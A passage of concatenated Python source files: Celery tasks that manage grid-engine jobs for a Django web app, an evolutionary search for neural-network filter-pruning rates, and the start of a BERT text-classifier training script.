system.\n            cmd = settings.GRID_ENGINE_DELETE_CMD.split(\" \")\n            if isinstance(cmd, list):\n                job_delete = subprocess.run(cmd, capture_output=True)\n            else:\n                job_delete = subprocess.run([cmd], capture_output=True)\n\n            # Remove jobs-in-process dir created in activate_job\n            ftplus_path = Path(settings.SCC_FTPLUS_PATH, \"jobs-in-process\", f\"{job.uuid}\")\n            if ftplus_path.exists():\n                subprocess.run([\"rm\", \"-rf\", f\"{ftplus_path}\"])\n\n    except Job.DoesNotExist:\n        logger.warning(f\"Job {pk} does not exist\")\n\n\ndef parse_qstat_output(output: str):\n    \"\"\"\n    Takes output from qstat, captured by job_poll in scheduled_poll_job()\n    Returns list of dictionaries. 
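(qstat's 'submit/start at' header is normalized to 'submit-start-at' first so it parses as a single column.) 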
Each dict represents 1 row of qstat output\n That data is sent to update_jobs(), to update Job instances in web app\n \"\"\"\n if \"submit/start at\" in output:\n output = output.replace(\"submit/start at\", \"submit-start-at\")\n if len(output) < 5:\n return []\n\n lines = [line for line in output.split(\"\\n\") if len(line)]\n header_keys = [column for column in lines[0].split(\" \") if len(column)]\n\n headers = {}\n header_cols = []\n for header_col in range(len(header_keys)):\n header = header_keys[header_col]\n start = lines[0].find(header)\n try:\n next_header = header_keys[header_col + 1]\n end = lines[0].find(next_header)\n except IndexError:\n end = None\n\n header_cols.append(start)\n headers[header] = {\n \"name\": header,\n \"start\": start,\n \"end\": end,\n }\n\n rows = []\n for row in lines[2:]:\n #if \"@scc-\" in row:\n data = {}\n for column in headers:\n start = headers[column][\"start\"]\n end = headers[column][\"end\"]\n if end:\n data[column] = row[start:end].strip()\n else:\n data[column] = row[start:].strip()\n \n \n #data = {}\n #for column in headers:\n # start = headers[column][\"start\"]\n # end = headers[column][\"end\"]\n # if end:\n # data[column] = row[start:end].strip()\n # else:\n # data[column] = row[start:].strip()\n rows.append(data)\n return rows\n\n\n@task(bind=True, ignore_result=True, max_retries=0)\ndef scheduled_allocate_job(self: celery.Task) -> None:\n \"\"\"\n Allocates existing Job instances to Celery at a set interval\n Interval determined by settings.CELERY_BEAT_SCHEDULE\n Should do so based on availability of different priority queues\n Availability based on settings.SCC_MAX_{priority}_JOBS\n \"\"\"\n\n start = dt.now()\n # Look at how many jobs are Status.QUEUED, and Status.ACTIVE\n has_queued_jobs = bool(Job.objects.queued().exists())\n\n # Do we have any queued jobs ready to schedule?\n if has_queued_jobs:\n # Allocate *low* priority jobs\n active_jobs = Job.objects.exclude_imported().active()\n logger.info(f\"{active_jobs.count()} jobs are active\")\n\n queued_jobs = Job.objects.exclude_imported().queued()\n # queued_jobs = Job.objects.queued()\n logger.info(f\"{queued_jobs.count()} jobs are queued\")\n\n # if jobs_in_process < settings.SCC_MAX_LOW_JOBS:\n # jobs_to_allocate = 100\n # logger.info(f\"{jobs_to_allocate} new jobs were allocated\")\n for queued_job in queued_jobs.all(): # [:jobs_to_allocate]:\n logger.info(f\"running activate_job(pk={queued_job.pk})\")\n activate_job.delay(pk=queued_job.pk)\n\n # # Allocate *high* priority jobs\n # active_jobs = Job.objects.exclude_imported().high_priority().active()\n # queued_jobs = Job.objects.exclude_imported().high_priority().queued()\n # jobs_in_process = active_jobs.count()\n # logger.info(\n # f\"{jobs_in_process} of {settings.SCC_MAX_HIGH_JOBS} high priority jobs are active\"\n # )\n\n # if jobs_in_process < settings.SCC_MAX_HIGH_JOBS:\n # jobs_to_allocate = settings.SCC_MAX_HIGH_JOBS - jobs_in_process\n # logger.info(f\"{jobs_to_allocate} new high priority jobs were allocated\")\n # for queued_job in queued_jobs[:jobs_to_allocate]:\n # activate_job.delay(pk=queued_job.pk)\n\n # # Allocate *normal* priority jobs\n # active_jobs = Job.objects.exclude_imported().normal_priority().active()\n # queued_jobs = Job.objects.exclude_imported().normal_priority().queued()\n # jobs_in_process = active_jobs.count()\n # logger.info(\n # f\"{jobs_in_process} of {settings.SCC_MAX_NORMAL_JOBS} normal priority jobs are active\"\n # )\n\n # if jobs_in_process < settings.SCC_MAX_NORMAL_JOBS:\n # 
jobs_to_allocate = settings.SCC_MAX_NORMAL_JOBS - jobs_in_process\n # logger.info(f\"{jobs_to_allocate} new medium priority jobs were allocated\")\n # for queued_job in queued_jobs[:jobs_to_allocate]:\n # activate_job.delay(pk=queued_job.pk)\n\n # # Allocate *low* priority jobs\n # active_jobs = Job.objects.exclude_imported().low_priority().active()\n # queued_jobs = Job.objects.exclude_imported().low_priority().queued()\n # jobs_in_process = active_jobs.count()\n # logger.info(\n # f\"{jobs_in_process} of {settings.SCC_MAX_LOW_JOBS} low priority jobs are active\"\n # )\n\n # if jobs_in_process < settings.SCC_MAX_LOW_JOBS:\n # jobs_to_allocate = settings.SCC_MAX_LOW_JOBS - jobs_in_process\n # logger.info(f\"{jobs_to_allocate} new low priority jobs were allocated\")\n # for queued_job in queued_jobs[:jobs_to_allocate]:\n # activate_job.delay(pk=queued_job.pk)\n\n stop = dt.now()\n logger.info(f\"SCHEDULED_ALLOCATE_JOB took {(stop-start).seconds} seconds\")\n\n\n@task(bind=True, ignore_result=True, max_retries=0)\ndef scheduled_capture_job_output(self: celery.Task) -> None:\n \"\"\"\n Periodically send TARed output directories from Status.COMPLETE & Status.ERROR jobs to web app\n Will also delete those directories from SCC\n Interval determined by settings.CELERY_BEAT_SCHEDULE\n Directory will be based on a setting\n \"\"\"\n\n # We don't want imported jobs, jobs with no input file, or jobs with an output file\n capture_jobs = (\n Job.objects.exclude_imported()\n .exclude(\n input_file__in=[\"\", None],\n )\n .filter(\n status__in=[Status.FINISHED, Status.ERROR],\n output_file__in=[\"\", None],\n last_exception_count__lt=10,\n )\n )\n\n for job in capture_jobs:\n logger.info(f\"Processing Job: {job.uuid}\")\n\n try:\n ftplus_path = Path(\n settings.SCC_FTPLUS_PATH, \"jobs-in-process\", f\"{job.uuid}\"\n )\n scc_job_input_file = f\"{job.input_file.path}\"\n logger.debug(scc_job_input_file)\n\n cmd = [\n \"tar\",\n \"-czf\",\n f\"{scc_job_input_file}\",\n \"-C\",\n f\"{ftplus_path}\",\n \".\",\n ]\n\n logger.debug(f\"File Retrival Command: {cmd}\")\n\n # directory existence check\n if ftplus_path.exists():\n subprocess.run(cmd)\n scc_job_output_file = scc_job_input_file.replace(\n \"jobs_input\", \"jobs_output\"\n )\n\n # Rename our input_file to match where we want our output_file to be\n Path(scc_job_input_file).rename(scc_job_output_file)\n\n job.output_file = scc_job_output_file.replace(\n f\"{settings.MEDIA_ROOT}\", \"\"\n )\n job.save()\n\n # Delete SCC directory\n subprocess.run([\"rm\", \"-rf\", f\"{ftplus_path}\"])\n else:\n raise Exception(f\"ftplus_path path: {ftplus_path} was not found\")\n\n except Exception as e:\n msg = f\"Job status changed to error. 
Exception: {e}\"\n            job.status = Status.ERROR\n            job.last_exception = msg\n            job.last_exception_at = timezone.now()\n            job.last_exception_count = F(\"last_exception_count\") + 1\n            job.save()\n            JobLog.objects.create(job=job, event=msg)\n            logger.exception(msg)\n\n\n@task(bind=True, ignore_result=True, max_retries=0)\ndef scheduled_cleanup_job(self: celery.Task, limit: int = 10_000) -> None:\n    \"\"\"\n    To avoid overloading our database with old jobs, we clean up imported\n    jobs older than 7 days\n    \"\"\"\n    deleted_date = timezone.now() - timedelta(days=7)\n    deleted_count, deleted_jobs = Job.objects.filter(\n        pk__in=list(\n            Job.objects.imported()\n            .filter(created__lt=deleted_date)\n            .order_by(\"created\")\n            .values_list(\"pk\", flat=True)[:limit]\n        )\n    ).delete()\n    logger.info(f\"Deleted Jobs: {deleted_count}, {deleted_jobs}\")\n\n\n@task(bind=True, ignore_result=True, max_retries=0)\ndef scheduled_poll_job(self: celery.Task) -> None:\n    \"\"\"\n    Checks status of current SCC jobs at a set interval\n    Interval determined by settings.CELERY_BEAT_SCHEDULE\n\n    Processing of those jobs will be handled by update_jobs()\n    \"\"\"\n\n    start = dt.now()\n    # str.split always returns a list, so cmd can be passed directly\n    cmd = settings.GRID_ENGINE_STATUS_CMD.split(\" \")\n    job_poll = subprocess.run(cmd, capture_output=True, text=True)\n\n    # Capture qstat info as a list of dictionaries\n    logger.debug(f\"\\nJOB_POLL.STDOUT{job_poll.stdout}\")\n    qstat_output = parse_qstat_output(job_poll.stdout)\n    # Update jobs w/ qstat info\n    logger.debug(f\"\\nQSTAT_OUTPUT{qstat_output}\")\n    logger.info(qstat_output)\n    logger.info(cmd)\n\n    update_start = dt.now()\n    update_jobs(qstat_output)\n    update_stop = dt.now()\n    logger.info(f\"UPDATE_JOBS took {(update_stop-update_start).seconds} seconds\")\n\n    stop = dt.now()\n    logger.info(f\"SCHEDULED_POLL_JOB took {(stop-start).seconds} seconds\")\n\n\ndef update_jobs(qstat_output: list) -> None:\n    \"\"\"\n    Takes input from scheduled_poll_job (a list of dictionaries)\n    Parses that and saves the results to job objects in the web app\n    Also updates Job.Status on jobs that have Errored or are complete\n    Creation and processing of imported job objects is also handled here\n    \"\"\"\n\n    user, created = User.objects.get_or_create(email=settings.SCC_DEFAULT_EMAIL)\n    scc_job_list = []\n    # Update all jobs w/ their qstat results\n    for row in qstat_output:\n        logger.debug(f\"\\nROW IS {row}\")\n        try:\n            job_id = row[\"job-ID\"]\n            # `or None` also guards against a missing or empty ja-task-ID column\n            job_ja_task_id = row.get(\"ja-task-ID\") or None\n            job_state = row[\"state\"]\n            job_submitted = f\"{row['submit-start-at']}\".replace(\"/\", \"-\")\n            job_submitted = parse(job_submitted)\n            updated = False\n\n            if job_submitted:\n                job_submitted = pytz.timezone(settings.TIME_ZONE).localize(\n                    job_submitted, is_dst=None\n                )\n\n            try:\n                # Since BU doesn't care about imported jobs\n                # Do we want to change this to ONLY update?\n                # I see errors for multiple jobs submitted coming from here; we should test this without creating entries for non-submitted jobs\n                qs1 = Job.objects.queued()\n                qs2 = Job.objects.active()\n                scc_jobs = qs1.union(qs2) #<- this would be before the loop\n                ids = [x.sge_task_id for x in scc_jobs] #<- before loop\n                # if job_id in ids:\n                #     job.job_data = row\n                #     job.job_ja_task_id = job_ja_task_id\n                #     job.job_state = job_state\n                #     job.job_submitted = job_submitted\n                # 
job.scc_user = row.get(\"user\")\n # job.save()\n # can we do something like this to not get imported jobs?\n #job, created = Job.objects.get_or_create(\n # sge_task_id=job_id,\n # defaults={\n # \"imported\": True,\n # \"job_data\": row,\n # \"job_ja_task_id\": job_ja_task_id,\n # \"job_state\": job_state,\n # \"job_submitted\": job_submitted,\n # \"status\": Status.ACTIVE,\n # \"user\": user,\n # },\n #)\n #if not created:\n # job.job_data = row\n # job.job_ja_task_id = job_ja_task_id\n # job.job_state = job_state\n # job.job_submitted = job_submitted\n # job.scc_user = row.get(\"user\")\n # job.save()\n scc_job_list.append(int(job_id)) \n if job_id in ids:\n job = Job.objects.get(sge_task_id=job_id)\n job.job_data = row\n job.job_ja_task_id = job_ja_task_id\n job.job_state = job_state\n job.job_submitted = job_submitted\n job.scc_user = row.get(\"user\")\n job.save()\n updated = True\n #job = Job.objects.get(sge_task_id=job_id)\n #job.job_data = row\n #job.job_ja_task_id = job_ja_task_id\n #job.job_state = job_state\n #job.job_submitted = job_submitted\n #job.scc_user = row.get(\"user\")\n #job.save()\n\n except Job.MultipleObjectsReturned:\n logger.warning(f\"Multiple jobs found for {job_id}\")\n logger.debug(f\"Deleting jobs for {job_id}\")\n Job.objects.filter(sge_task_id=job_id).delete()\n\n #job, created = Job.objects.get_or_create(\n # sge_task_id=job_id,\n # defaults={\n # \"imported\": True,\n # \"job_data\": row,\n # \"job_ja_task_id\": job_ja_task_id,\n # \"job_state\": job_state,\n # \"job_submitted\": job_submitted,\n # \"status\": Status.ACTIVE,\n # \"user\": user,\n # },\n #)\n logger.debug(f\"Creating new job {job_id} as {job.uuid}\")\n\n # If an imported job is created, set to Status.ACTIVE & note it's imported\n # Error jobs will be updated later\n #if created:\n if updated:\n # Job.objects.filter(sge_task_id=job_id).update(\n # imported=True, status=Status.ACTIVE\n # )\n #JobLog.objects.create(job=job, event=\"Imported job added to web app\")\n JobLog.objects.create(job=job, event=\"Job updated with qstat info\")\n \n else:\n #JobLog.objects.create(job=job, event=\"Job updated with qstat info\")\n pass\n\n #scc_job_list.append(int(job_id))\n\n except Exception as e:\n logger.exception(f\"Job {job_id} :: {e}\")\n\n # Update status for Error jobs; will also catch imported Error jobs\n error_jobs = Job.objects.exclude(\n status__in=[\n Status.COMPLETE,\n Status.DELETED,\n Status.ERROR,\n ]\n ).filter(job_state=\"Eqw\")\n for job in error_jobs:\n job.status = Status.ERROR\n job.save()\n JobLog.objects.create(\n job=job, event=\"Job status changed to error based on SCC's `Eqw` state\"\n )\n\n # Update status of jobs that have been imported so they get out of our way\n Job.objects.imported().exclude(\n status__in=[\n Status.COMPLETE,\n Status.DELETED,\n Status.ERROR,\n ]\n ).update(status=Status.COMPLETE)\n\n # Update status for Complete jobs\n active_jobs = Job.objects.exclude_imported().active()\n finished_jobs = Job.objects.exclude_imported().finished()\n # Completed SCC jobs show NO result in qstat\n logger.warning(scc_job_list)\n for job in active_jobs:\n if job.sge_task_id not in scc_job_list:\n \n #files = { \n job.status = Status.FINISHED\n job.save()\n JobLog.objects.create(job=job, event=\"Job status changed to finished\")\n\n for job in finished_jobs: \n if bool(job.output_file): \n # If our SCC_WEBHOOK_ENABLED settings is set to True, we\n # will fire off a webhook to a url when Jobs have been\n # successfully completed.\n job.status = Status.COMPLETE\n 
job.save()\n            JobLog.objects.create(job=job, event=\"Job status changed to complete\")\n            if getattr(settings, \"SCC_WEBHOOK_ENABLED\", False):\n                send_webhook.delay(pk=job.pk)\n\n\n@task(bind=True, ignore_result=True)\ndef send_webhook(self: celery.Task, *, pk: typing.Union[str, uuid.UUID]):\n    try:\n        job = Job.objects.get(pk=pk)\n        try:\n            # build our webhook url\n            url = settings.SCC_WEBHOOK_COMPLETED_JOB_URL.format(job.pk)\n            msg = f\"Sending Job {job.pk} to {url}\"\n            logger.info(msg)\n            JobLog.objects.create(job=job, event=msg)\n\n            # get our webhook auth token\n            token_auth = TokenAuth(settings.SCC_WEBHOOK_COMPLETED_JOB_API_TOKEN)\n\n            # prepare our data to JSON and send...\n            job_serializer = JobSerializer(job)\n            data = job_serializer.data\n\n            if Path(job.output_file.path).exists():\n                files = {\n                    \"ftmap_results_tar_file\": Path(job.output_file.path).open(\"rb\")\n                }\n            else:\n                files = {}\n\n            # raise_for_status must be called on the response object\n            response = requests.post(url, auth=token_auth, data=data, files=files)\n            response.raise_for_status()\n\n        except Exception as e:\n            logger.warning(f\"Job {pk} errored. {e}\")\n\n    except Job.DoesNotExist:\n        logger.warning(f\"Job {pk} does not exist. We can not send the webhook\")\n\n\n@task(bind=True, ignore_result=True)\ndef update_job_priority(\n    self: celery.Task, *, pk: typing.Union[str, uuid.UUID], new_priority: str\n) -> None:\n    \"\"\"\n    Update Job.priority\n    Current assumption: 3 priority levels: Low/Normal/High\n    Due to design changes, this task isn't in use at 2021-06-01\n    It is tested by test_update_job_priority\n    \"\"\"\n    try:\n        job = Job.objects.get(pk=pk)\n        job.priority = new_priority\n        job.save()\n\n        JobLog.objects.create(job=job, event=f\"Job priority changed to {new_priority}\")\n\n    except Job.DoesNotExist:\n        logger.warning(f\"Job {pk} does not exist\")\n","repo_name":"vajda-lab/scc-api","sub_path":"src/jobs/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":23540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20355820090","text":"import os\nimport math\nimport random\nimport numpy as np\nimport argparse\n\nimport torch\nimport torch.nn as nn\nimport copy\n\n\nimport sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nimport torch_pruning as tp\nfrom filter_pruning.torch_pruning.pruning import filter_pruning_random\nfrom fp_utils.utils import *\n\n\n\ndef softmax_numpy(x):\n    e_x = np.exp(x.astype(float) - np.max(x))\n    return e_x / e_x.sum()\n\n\ndef uniform_normal_init(loc, scale, size): \n    a = np.random.normal(loc=loc,scale=scale,size=size)\n    mask = a <= loc\n    b = np.random.uniform(0.001,loc,size)\n    out = a*(1-mask)+b*mask\n    return out\n\ndef mix_normal_init(loc, size, max_value):\n    out = []\n    scale1 = (max_value-loc)/3.0\n    scale2 = (loc-0.001)/3.0\n    cnt = 0\n    while cnt < size:\n        a = np.random.normal(loc=loc,scale=scale1)\n        if a > 0.1:\n            a = max_value if (a > max_value) else a\n            out.append(a)\n        else:\n            while True:\n                b=np.random.normal(loc=loc,scale=scale2)\n                if b < 0.1 and b>0:\n                    out.append(b)\n                    break\n        cnt+=1\n    out = np.array(out)\n    return out\n\ndef saturation_value(a, min, max):\n    m1 = a < min\n    # a = (0.5/args.max_PARAMs)*m1+a*(1-m1)\n    a = min*m1+a*(1-m1)\n    m2 = a > max\n    a = max*m2+a*(1-m2)\n    return a\n\n\ndef random_can_fp(model, max_FLOPs_FP, max_PARAMs_FP, target_params_fp, target_flops_fp, \n                input_size, num, num_states, total_flops, total_params):\n    print('random select ........', flush=True)\n    candidates = []\n    candidates_int = []\n    # loop_num = 0\n    
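# Rejection sampling: draw a candidate pruning-rate vector from a clipped\n    # Gamma prior, measure the pruned model's FLOPs/params, and keep the vector\n    # only if the reduction falls inside [target, target + 0.1].\n    while 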
len(candidates)<num:\n if max_FLOPs_FP == 0 and max_PARAMs_FP == 0:\n can = np.zeros(num_states+2)\n can[-1] = total_flops\n can[-2] = total_params\n print('pruning rate = 0') \n else:\n # if loop_num % 20==0:\n # print('loop start: %d' % loop_num)\n # if(loop_num > 200):\n # break \n # loop_num += 1\n # # uniform random init\n # high = 2.0/max(max_PARAMs_FP,max_FLOPs_FP)\n # can = np.random.uniform(0.01,high,num_states+2)\n\n # ## uniform normal init\n # # mu = 1/max(max_PARAMs_FP,max_FLOPs_FP)\n # mu = max(max_PARAMs_FP,max_FLOPs_FP)\n # sigma = (0.5-mu) / 3.0\n # can = uniform_normal_init(mu, sigma, num_states+2)\n\n # # # mix normal_init\n # loc = 1.0/max(max_PARAMs_FP,max_FLOPs_FP)\n # can = mix_normal_init(loc,num_states+2,0.99)\n\n # # gamma init\n loc = max(max_PARAMs_FP, max_FLOPs_FP)\n # can = np.random.gamma(loc*8.0, 0.125, num_states + 2)\n can = np.random.gamma(loc*8.0, 0.125, num_states + 2)\n mask1 = can >= 0.9999\n mask2 = can <= 0.0001\n can = mask1 * 0.9999 + (1 - mask1) * can\n can = mask2 * 0.0001 + (1 - mask2) * can\n\n t_can = tuple(can[:-2])\n # print(can[:-2].tolist())\n\n # model = models.__dict__[args.arch]()\n\n\n fp_model = filter_pruning_random(model,torch.randn(1,3,input_size,input_size),output_transform=None,pruning_rates=t_can)\n\n layer_flops = calc_model_flops(fp_model, input_size, mul_add=False)\n sparse_total_flops = sum(layer_flops)\n layer_params = calc_model_parameters(fp_model)\n sparse_total_params = sum(layer_params)\n # print('pruning rate (flops): ', 1.0-sparse_total_flops/total_flops)\n # print('pruning rate (params): ', 1.0-sparse_total_params/total_params)\n\n if max_FLOPs_FP == 0 and max_PARAMs_FP !=0:\n if 1.0-sparse_total_params/total_params < target_params_fp or 1.0-sparse_total_params/total_params > target_params_fp+0.1:\n continue\n elif max_FLOPs_FP != 0 and max_PARAMs_FP ==0:\n if 1.0-sparse_total_flops/total_flops < target_flops_fp or 1.0-sparse_total_flops/total_flops > target_flops_fp+0.1:\n continue\n else:\n if 1.0-sparse_total_flops/total_flops < target_flops_fp or 1.0-sparse_total_flops/total_flops > target_flops_fp+0.1 or 1.0-sparse_total_params/total_params < target_params_fp or 1.0-sparse_total_params/total_params > target_params_fp+0.1:\n continue\n\n can[-1] = sparse_total_flops\n can[-2] = sparse_total_params\n\n # compare difference\n t_can_int = [math.ceil(i*100.0) for i in t_can]\n\n\n if t_can_int in candidates_int:\n continue\n else:\n candidates_int.append(t_can_int)\n\n # print(total_flops/sparse_total_flops)\n print('number of candidates: ', len(candidates))\n candidates.append(can.tolist())\n\n # print(len(candidates))\n # print(len(candidates_int))\n\n # print('random_num = {}'.format(len(candidates)), flush=True)\n return candidates\n\n# mutation operation in evolution algorithm\ndef get_mutation_fp(model, max_FLOPs_FP, max_PARAMs_FP, target_params_fp, target_flops_fp, \n input_size, epoch, keep_top_candidates, top_candidates_score, num_states, mutation_num, \n m_prob, strength, total_flops, total_params):\n \n print('mutation ......', flush=True)\n res = []\n candidates_int = []\n global_candidates_int = []\n\n for candidator in keep_top_candidates:\n global_candidates_int.append([math.ceil(i*100.0) for i in candidator[:-2]])\n \n k = len(keep_top_candidates)\n iter = 0\n max_iters = 10*mutation_num\n # top_candidates_score = top_candidates_score / 100.0\n top_k_p = softmax_numpy(top_candidates_score)\n while len(res)<mutation_num and iter<max_iters:\n # while len(res)<mutation_num:\n\n if max_FLOPs_FP == 0 and 
max_PARAMs_FP == 0:\n can = np.zeros(num_states+2)\n can[-1] = total_flops\n can[-2] = total_params \n res.append(can.tolist()) \n else:\n # ids = np.random.choice(k, mutation_num,replace=False,p=top_k_p)\n # ids = np.random.choice(k, mutation_num,replace=False)\n # ids = np.random.choice(k, mutation_num,p=top_k_p)\n ids = np.random.choice(k, mutation_num)\n # print(ids)\n select_seed = np.array([keep_top_candidates[id] for id in ids])\n # if epoch < 50:\n # alpha = np.random.uniform(0,1,num_states+2)\n # elif epoch < 100:\n # alpha = np.random.uniform(0.25,0.75,num_states+2)\n # elif epoch < 120:\n # alpha = np.random.uniform(0.35,0.65,num_states+2)\n # alpha = np.random.uniform(0,1,num_states+2)\n alpha = np.random.normal(loc=0.5,scale=0.1,size=num_states+2)\n is_m = np.random.choice(np.arange(0,2), (mutation_num, num_states+2), p=[1-m_prob, m_prob]).astype(np.float32)\n # is_m[:,0] = np.random.choice(np.arange(0,2),len(is_m[:,0]) , p=[0.6, 0.4]).astype(np.float32)\n # is_m[:,-1] = np.random.choice(np.arange(0,2),len(is_m[:,-1]) , p=[0.6, 0.4]).astype(np.float32)\n # select_list = select_seed*(1.0-is_m)+(1.0-select_seed)*is_m\n mask1 = alpha >= 1\n mask2 = alpha <= 0\n alpha = alpha*(1-mask1)+0.5*(mask1) \n alpha = alpha*(1-mask2)+0.5*(mask2)\n mask = alpha < 0.5\n beta = (pow((2*alpha),(1/strength))-1)*mask + (1-pow((2*(1-alpha)),(1/strength)))*(1-mask)\n select_list = select_seed+beta*is_m\n select_list = saturation_value(select_list, 0.0001, 0.9999)\n iter += 1\n cnt = 0\n for can in select_list:\n cnt = cnt + 1\n sum_mask = sum(is_m[cnt-1])\n t_can = tuple(can[:-2])\n\n # model = models.__dict__[args.arch]()\n\n fp_model = filter_pruning_random(model,torch.randn(1,3,input_size,input_size), output_transform=None, pruning_rates=t_can)\n\n layer_flops = calc_model_flops(fp_model,input_size,mul_add=False)\n sparse_total_flops = sum(layer_flops)\n layer_params = calc_model_parameters(fp_model)\n sparse_total_params = sum(layer_params)\n\n if max_FLOPs_FP == 0 and max_PARAMs_FP !=0:\n if 1.0-sparse_total_params/total_params < target_params_fp or 1.0-sparse_total_params/total_params > target_params_fp+0.1:\n continue\n elif max_FLOPs_FP != 0 and max_PARAMs_FP ==0:\n if 1.0-sparse_total_flops/total_flops < target_flops_fp or 1.0-sparse_total_flops/total_flops > target_flops_fp+0.1:\n continue\n else:\n if 1.0-sparse_total_flops/total_flops < target_flops_fp or 1.0-sparse_total_flops/total_flops > target_flops_fp+0.1 \\\n or 1.0-sparse_total_params/total_params < target_params_fp or 1.0-sparse_total_params/total_params > target_params_fp+0.1:\n continue\n can[-1] = sparse_total_flops\n can[-2] = sparse_total_params\n # print(total_flops/sparse_total_flops)\n # print(total_params/sparse_total_params)\n\n # compare difference\n t_can_int = [math.ceil(i*100.0) for i in t_can]\n if (t_can_int in candidates_int) or (t_can_int in global_candidates_int):\n continue\n else:\n candidates_int.append(t_can_int)\n\n res.append(can)\n if len(res)==mutation_num:\n break\n print('mutation_num = {}'.format(len(res)), flush=True)\n return res\n\n# crossover operation in evolution algorithm\ndef get_crossover_fp(model, max_FLOPs_FP, max_PARAMs_FP, target_params_fp, target_flops_fp, \n input_size, keep_top_candidates, top_candidates_score, num_states, crossover_num, total_flops,total_params):\n \n print('crossover ......', flush=True)\n res = []\n candidates_int = []\n global_candidates_int = []\n for candidator in keep_top_candidates:\n global_candidates_int.append([math.ceil(i*100.0) for i in 
candidator[:-2]])\n\n    k = len(keep_top_candidates)\n    # top_candidates_score = top_candidates_score / 100.0\n    top_k_p = softmax_numpy(top_candidates_score)\n    iter = 0\n    max_iters = 10 * crossover_num\n    while len(res)<crossover_num and iter<max_iters:\n    # while len(res)<crossover_num:\n\n        # zero pruning targets: return the unpruned model stats (this check\n        # matches random_can_fp and get_mutation_fp above)\n        if max_FLOPs_FP == 0 and max_PARAMs_FP == 0:\n            can = np.zeros(num_states+2)\n            can[-1] = total_flops\n            can[-2] = total_params\n            res.append(can.tolist())\n        else:\n            # id1, id2 = np.random.choice(k, 2, replace=False)\n            # id1, id2 = np.random.choice(k, 2, replace=False,p=top_k_p)\n            # print([id1,id2])\n            # p1 = keep_top_candidates[id1]\n            # p2 = keep_top_candidates[id2]\n            id1 = np.random.choice(k, 1, p=top_k_p)\n            id2 = np.random.choice(k, 1)\n            # print([id1[0],id2[0]])\n            p1 = keep_top_candidates[id1[0]]\n            p2 = keep_top_candidates[id2[0]]\n\n            # recombination\n            alpha = np.random.rand(len(p1))\n            can = p1*alpha + p2*(1.0-alpha)\n\n            # alpha = np.random.uniform(-1, 1, len(p1))\n            # can = p1+alpha*(p1-p2)\n\n            can = saturation_value(can, 0.0001, 0.9999)\n            # ## Discrete recombination\n            # mask = np.random.randint(low=0, high=2, size=(num_states+2)).astype(np.float32)\n            # can = p1*mask + p2*(1.0-mask)\n            iter += 1\n            t_can = tuple(can[:-2])\n\n            # model = models.__dict__[args.arch]()\n\n            fp_model = filter_pruning_random(model, torch.randn(1,3,input_size,input_size),output_transform=None,pruning_rates=t_can)\n\n            layer_flops = calc_model_flops(fp_model,input_size,mul_add=False)\n            sparse_total_flops = sum(layer_flops)\n            layer_params = calc_model_parameters(fp_model)\n            sparse_total_params = sum(layer_params)\n\n            if max_FLOPs_FP == 0 and max_PARAMs_FP !=0:\n                if 1.0-sparse_total_params/total_params < target_params_fp or 1.0-sparse_total_params/total_params > target_params_fp+0.1:\n                    continue\n            elif max_FLOPs_FP != 0 and max_PARAMs_FP ==0:\n                if 1.0-sparse_total_flops/total_flops < target_flops_fp or 1.0-sparse_total_flops/total_flops > target_flops_fp+0.1:\n                    continue\n            else:\n                if 1.0-sparse_total_flops/total_flops < target_flops_fp or 1.0-sparse_total_flops/total_flops > target_flops_fp+0.1 or \\\n                    1.0-sparse_total_params/total_params < target_params_fp or 1.0-sparse_total_params/total_params > target_params_fp+0.1:\n                    continue\n\n            can[-1] = sparse_total_flops\n            can[-2] = sparse_total_params\n            # print(total_flops/sparse_total_flops)\n            # print(total_params/sparse_total_params)\n\n            # compare difference\n            t_can_int = [math.ceil(i*100.0) for i in t_can]\n            if (t_can_int in candidates_int) or (t_can_int in global_candidates_int):\n                continue\n            else:\n                candidates_int.append(t_can_int)\n\n            res.append(can)\n        if len(res)==crossover_num:\n            break\n    print('crossover_num = {}'.format(len(res)), flush=True)\n    return res\n","repo_name":"MAS0NM/YOLO","sub_path":"filter_pruning/search/search_filter_pruning.py","file_name":"search_filter_pruning.py","file_ext":"py","file_size_in_byte":13645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13270873882","text":"import io\nimport random\nimport os\n\nimport pandas as pd\nimport numpy as np\n\nimport mxnet as mx\nimport gluonnlp as nlp\nfrom bert import data, model\n\nDATA_PATH = \"data\"\n\ntrain = pd.read_csv(os.path.join(DATA_PATH, \"train.csv\"))\ntest = pd.read_csv(os.path.join(DATA_PATH, \"test.csv\"))\n\nnp.random.seed(100)\nrandom.seed(100)\nmx.random.seed(10000)\n# change `ctx` to `mx.gpu()` if a GPU is available.\nctx = mx.cpu()\n\n
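# Load the 12-layer/768-hidden BERT base encoder together with its vocabulary;\n# the pooler output feeds the classification head, while the masked-LM decoder\n# and next-sentence classifier heads are not needed here.\nbert_base, vocabulary = nlp.model.get_model(\n    'bert_12_768_12',\n    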
dataset_name='book_corpus_wiki_en_uncased',\n    pretrained=True,\n    ctx=ctx,\n    use_pooler=True,\n    use_decoder=False,\n    use_classifier=False)\nprint(bert_base)\n\nbert_classifier = nlp.model.BERTClassifier(bert_base,\n                                           num_classes=2,\n                                           dropout=0.1)\n# only need to initialize the classifier layer.\nprint(\"Initializing classifier...\")\nbert_classifier.classifier.initialize(init=mx.init.Normal(0.02), ctx=ctx)\nbert_classifier.hybridize(static_alloc=True)\n\n# softmax cross entropy loss for classification\nloss_function = mx.gluon.loss.SoftmaxCELoss()\nloss_function.hybridize(static_alloc=True)\n\nmetric = mx.metric.Accuracy()\n\n## Imputation\nprint(\"Imputing...\")\ntrain = train.fillna(\"missing\")\ntest = test.fillna(\"missing\")\n\nbert_tokenizer = nlp.data.BERTTokenizer(vocabulary, lower=True)\n\n# The maximum length of an input sequence\nmax_len = 256\n\n# The labels for the two classes [(0 = not a disaster) or (1 = disaster)]\nall_labels = [0, 1]\n\n# whether to transform the data as sentence pairs.\n# for single sentence classification, set pair=False\n# for regression task, set class_labels=None\n# for inference without label available, set has_label=False\npair = False\nprint(\"Transforming...\")\ntransform = data.transform.BERTDatasetTransform(bert_tokenizer,\n                                                max_len,\n                                                class_labels=all_labels,\n                                                has_label=True,\n                                                pad=True,\n                                                pair=pair)\n\ntrain_df = train.drop(columns=\"id\")\ntrain_df[\"full_text\"] = train_df.apply(\n    lambda x: f\"{x['text']} at 